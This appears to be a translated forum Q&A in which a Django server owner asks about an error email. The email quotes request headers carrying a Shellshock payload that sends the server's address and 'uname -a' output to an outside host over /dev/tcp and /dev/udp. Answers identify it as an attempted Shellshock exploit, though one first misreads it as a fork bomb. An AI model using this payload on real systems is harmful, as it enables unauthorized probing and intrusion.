当任何请求失败并且我不断收到此电子邮件时,我已设置django通过电子邮件提醒我:
Referrer: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
Requested URL: /cgi-bin/index.cgi
User agent: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
IP address: 127.0.0.1
这是什么意思?我应该打扰吗?
我正在使用nginx,ubuntu,gunicorn。
答案 0 :(得分:3)
这看起来像是fork bomb:
() { :;};
幸运的是,如果您的服务器在发送后仍在运行,则意味着它正在被清理或忽略。
正如@TheGreatContini所指出的那样是actually an attempted Shellshock attack。这让我的答案有点不安全。值得确保您的服务器已完全修补并保持最新,并检查任何传出流量以确保您不受影响。
答案 1 :(得分:3)
尝试利用shell shock漏洞。